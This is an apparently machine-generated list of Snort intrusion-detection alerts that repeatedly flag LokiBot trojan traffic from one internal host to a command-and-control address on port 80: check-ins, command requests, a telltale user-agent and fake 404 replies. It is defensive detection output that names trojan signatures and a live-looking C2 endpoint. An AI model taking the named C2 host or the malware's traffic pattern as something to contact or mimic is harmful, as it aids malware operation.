                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49700 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49700
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49701 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49701 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49701 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49701 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49701
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49702 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49702 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49702 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49702 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49702
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49703 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49703 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49703 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49703 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49703
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49704 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49704 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49704 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49704 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49704
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49706 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49706 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49706 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49706 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49706
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49707 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49707 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49707 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49707 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49707
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49708 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49708 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49708 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49708 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49708
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49709 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49709 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49709 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49709 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49709
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49710 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49710 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49710 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49710 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49710
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49711 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49711 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49711 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49711 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49711
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49712 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49712 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49712 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49712 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49712
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49713 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49713 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49713 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49713 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49713
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49714 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49714 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49714 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49714 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49714
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49715 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49715 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49715 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49715 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49715
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49716 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49716 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49716 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49716 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49716
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49717 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49717 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49717 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49717 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49717
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49718 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49718 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49718 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49718 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49718
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49719 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49719 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49719 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49719 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49719
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49720 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49720 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49720 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49720 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49720
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49721 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49721 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49721 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49721 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49721
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49722
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49723 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49723 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49723 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49723 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49723
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49724 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49724 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49724 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49724 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49724
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49725 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49725 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49725 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49725 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49725
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49726 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49726 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49726 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49726 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49726
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49727 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49727 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49727 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49727 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49727
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49728 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49728 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49728 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49728 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49728
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49729 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49729 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49729 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49729 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49729
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49730 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49730 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49730
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49731 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49731 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49731
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49732 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49732 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49732
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49733 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49733 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49733
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49734
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49735
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49736
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49737
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49738 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49738 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49738 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49738 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49738
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49739
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49740 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49740 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49740 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49740 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49740
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49741 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49741 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49741 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49741 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49741
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49742 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49742 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49742 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49742 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49742
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49743
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 87.251.79.157:80 -> 192.168.2.5:49744
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 87.251.79.157:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 87.251.79.157:80
